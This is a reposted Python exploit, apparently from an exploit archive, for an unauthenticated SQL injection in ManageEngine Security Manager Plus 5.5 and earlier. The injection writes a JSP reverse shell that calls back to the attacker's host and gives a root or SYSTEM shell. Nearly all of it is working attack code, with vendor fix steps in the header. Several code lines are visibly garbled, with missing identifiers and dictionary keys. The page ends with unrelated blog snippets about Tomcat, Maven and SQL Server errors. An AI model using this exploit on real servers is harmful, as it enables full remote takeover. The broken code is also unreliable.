ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi

简介: #!/usr/bin/python #+----------------...
# Exploit Title     : Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi (Win+Linux)
# Date              : 18-10-2012
# Author            : xistence (xistence<[AT]>
# Software link     : (Win)
# Software link     : (Linux)
# Vendor site       :
# Version           : 5.5 build 5505 and lower
# Tested on         : CentOS 5.x + Windows XP/2008
# Vulnerability     : The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse,
#             the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user,
#             which makes a remote shell with root/SYSTEM privileges possible....
# Fix:
# 1. Go to SMP server system and stop SMP service.
# 2. Download the file from :
# 3. Extract the downloaded file which contains four files : AdvPMServer.jar, AdvPMClient.jar, scanfi.jar and AdventNetPMUnixAgent.jar
# 3. Copy the extracted .jar files to <SMP-HOME>\lib directory (e.g., C:\AdventNet\SecurityManager\lib). [Overwrite the existing jar files and do not rename them]
# 4. Start the SMP service.
import urllib, urllib2, cookielib
import sys
import random
if (len(sys.argv) != 5):
    print ""
    print "[*] Security Manager Plus 5.5 build 5505 and lower Remote SYSTEM/root SQLi exploit (Windows+Linux) - xistence (xistence<[at]> - 2012-05-29"
    print ""
    print "[*] Usage: <RHOST> <LHOST> <LPORT> <OS>"
    print "[*] I.e.:  ./ 8888 linux"
    print "[*] I.e.:  ./ 8888 win"
    print "[*]"
    print "[*] RHOST = Remote Host which runs Security Manager Plus"
    print "[*] LHOST = IP address of local machine (machine where you run the exploit from"
    print "[*] LPORT = Port on the local machine where you will run NC on for our reverse shell"
    print "[*] OS = linux/win"
    print ""
    print ""
rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
osys = sys.argv[4]
if osys == 'linux':
    command = "/bin/bash"
elif osys == 'win':
    command = "cmd.exe"
    print "Choose a valid OS, linux/win"
filename = ''
for in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
filename +=".jsp"
output_path = "../../webapps/SecurityManager/%s" %filename
jsp = '''           <%@page import="java.lang.*"%>
            <%@page import="java.util.*"%>
            <%@page import="*"%>
            <%@page import="*"%>
                class StreamConnector extends Thread
                    InputStream is;
                    OutputStream os;
                    StreamConnector( InputStream is, OutputStream os )
               = is;
                        this.os = os;
                    public void run()
                        BufferedReader in  = null;
                        BufferedWriter out = null;
                            in  = new BufferedReader( new InputStreamReader( ) );
                            out = new BufferedWriter( new OutputStreamWriter( this.os ) );
                            char buffer[] = new char[8192];
                            int length;
                            while( ( length = buffer, 0, buffer.length ) ) > 0 )
                                out.write( buffer, 0, length );
                        } catch( Exception e ){}
                            if( in != null )
                            if( out != null )
                        } catch( Exception e ){}
                    Socket socket = new Socket( "''' + lhost +'''", '''+lport+''' );
                    Process process = Runtime.getRuntime().exec( "'''+command+'''" );
                    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
                } catch( Exception e ) {}
jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")
payload = "1)) "
payload += 'UNION SELECT 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 INTO OUTFILE "%s"' % (jsp.encode('hex'),output_path)
payload += " FROM mysql.user WHERE 1=((1"
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie','STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'))
post_params = urllib.urlencode({'ANDOR' 'and''condition_1' 'OpenPorts@PORT','operator_1' 'IN''value_1' : payload, 'COUNT' '1'})
print "[*] Sending evil payload"
resp ="http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" %rhost, post_params)
print "[*] Created Reverse JSP shell http://%s:6262/%s" % (rhost,filename)
resp ="http://%s:6262/%s"  % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)
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Tomcat 报错:The origin server did not find a current representation for the target resource
Tomcat 报错:The origin server did not find a current representation for the target resource
34 1
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【解决方案】A session ended very soon after starting. Check that the command in profile “XXX” is correct.
【解决方案】A session ended very soon after starting. Check that the command in profile “XXX” is correct.
778 0
【解决方案】A session ended very soon after starting. Check that the command in profile “XXX” is correct.
Java Maven
No valid Maven installation found. Either set the home directory in the configuration dialog or set
No valid Maven installation found. Either set the home directory in the configuration dialog or set
416 0
No valid Maven installation found. Either set the home directory in the configuration dialog or set
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1310 0
SQL Windows
Unable to determine if the owner (Domain\UserName) of job JOB_NAME has server access
早上巡检的的时候,发现一数据库的作业报如下错误(作业名等敏感信息已经替换),该作业的OWNER为一个域账号: JOB RUN: 'JOB_NAME' was run on 2016-6-1 at 7:00:00 DURATION: 0 hours, 0 minutes, 1 seconds STATUS: Failed MESSAGES: The job failed.
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